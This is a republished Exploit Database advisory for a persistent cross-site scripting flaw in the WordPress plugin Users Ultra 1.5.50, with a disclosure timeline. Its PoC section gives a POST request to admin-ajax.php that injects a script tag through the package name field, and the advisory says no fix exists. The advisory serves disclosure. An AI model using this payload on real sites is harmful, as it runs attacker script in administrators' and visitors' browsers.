WordPress Plugin Users Ultra 1.5.50 – Persistent Cross-Site Scripting

• Exploit Database
• 37 阅读

• 作者： Panagiotis Vagenas
  日期： 2015-12-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/38856/

• * Exploit Title: WordPress Users Ultra Plugin [Persistence XSS]
  * Discovery Date: 2015/10/20
  * Public Disclosure Date: 2015/12/01
  * Exploit Author: Panagiotis Vagenas
  * Contact: https://twitter.com/panVagenas
  * Vendor Homepage: http://usersultra.com
  * Software Link: https://wordpress.org/plugins/users-ultra/
  * Version: 1.5.50
  * Tested on: WordPress 4.3.1
  * Category: webapps
  
  
  Description
  ========================================================================
  ========
  
  Once a user is registered he can add new subscription packages or
  modify existing ones. No data sanitization is
  taking place before saving package details in DB. This allows a
  malicious user to include JS code in package name
  and/or package description.
  
  PoC
  ========================================================================
  ========
  
  - - Send a post request to
  `http://vuln.site.tld/wp-admin/admin-ajax.php` with data:
  `action=package_add_new&p_name=a<script>alert(1)</script>`
  - - Visit
  `http://vuln.site.tld/wp-admin/admin.php?page=userultra&tab=membership`
  as
  admin or go to the page that
  contains package information at front end.
  
  Timeline
  ========================================================================
  ========
  
  2015/10/29 - Vendor notified via email
  2015/11/11 - Vendor notified via contact form in his website
  2015/11/13 - Vendor notified via support forums at wordpress.org
  2015/11/14 - Vendor responded and received report through email
  
  Solution
  ========================================================================
  ========
  
  No official solution yet exists.